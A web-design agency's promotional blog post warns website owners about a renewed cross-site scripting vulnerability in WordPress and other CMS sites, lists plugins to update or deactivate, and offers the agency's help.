Revamped Vulnerabilty Envades Most All Dynamic Websites
Do you own or manage a website? If so, the Cross-site Scripting (XSS) Vulnerability may rear it’s ugly head, again…
In the last two weeks there was a major security breach (flaw) that hackers are busy exploiting. The cross-site scripting (XSS) vulnerability, potentially affects most all dynamic sites. In particular, sites that use WAMP (Windows, Apache, MySQL, PHP) or MAMP (Mac, Apache, MySQL, PHP) servers are at high risk.
NOTE: If you only have static html pages, stop here, you are not at risk.
Those of you who do have dynamic sites, which use server side requests to serve up your pages, oh snap, continue on! In less technical terms, if you use WordPress, Drupal, or Joomla’s, Content Management Systems (CMS) or similar systems, it’s likely you are affected.
What does this really mean?
What are hackers doing with this vulnerability? They are typically looking for private information that could include, bank records, medical records, and credit card numbers. Basically, they are on a treasure hunt for anything stored on servers they can exploit and sell on the black market. As an example, if you are using the WordFence plugin for WordPress, you may have noticed an increase in attempts to login into your site via the “Admin” username.
WordFence founder and CEO, Mark Maunder, sent a mass email to all WF subscribers asking them to update to WordPress 4.2.1. stating “they have noticed a significant amount of WP sites that are still vulnerable”.
Other CMS core providers, plug-in, and theme developers continue to rollout patches in response to this critical breach.
Watch out… for free themes & non-premium theme developers. Since they provide services for free, they are least likely to quickly respond or not respond at all to these necessary updates and security breaches. Thus, leaving your site exposed to the threat.
What can I do?
- Are you a Fusion4 client? Yes? Then, rest easy!
- We already applied all necessary updates when our security expert Justin D. Luke first advised us of the exploitation.
- If not and the instructions are within your wheelhouse:
- Update all themes, plug-ins, patches, etc.; most all CMS providers have core updates that will remedy the issue.
- Check your analytics; you may notice an increase in foreign activity which could mean overseas hackers are busy using your site to conduct their mischief!
- If you are using WordPress, turn off automatic comments and trash any/all suspicious comments to blog posts.
- If you are using any of the below listed plug-ins, either temporality deactivate them or update them immediately. There are over 400+ that have the vulnerability, but this is a good start:
- WordPress SEO
- Google Analytics
- All In one SEO
- Gravity forms
If you simply don’t speak “geek” or if any of this falls outside your wheelhouse: Contact us at fusion-4.com and we can help you remedy the situation.
Given the long list of variables that can leave the door open for attackers, lean on industry folks, like us, as we continue to work towards slamming the door shut on exploitations.
Contributing editors; Danny J Johnson (web application design and developer) and Justin D. Luke (cyber security, SQL, programmer) for Fusion-4.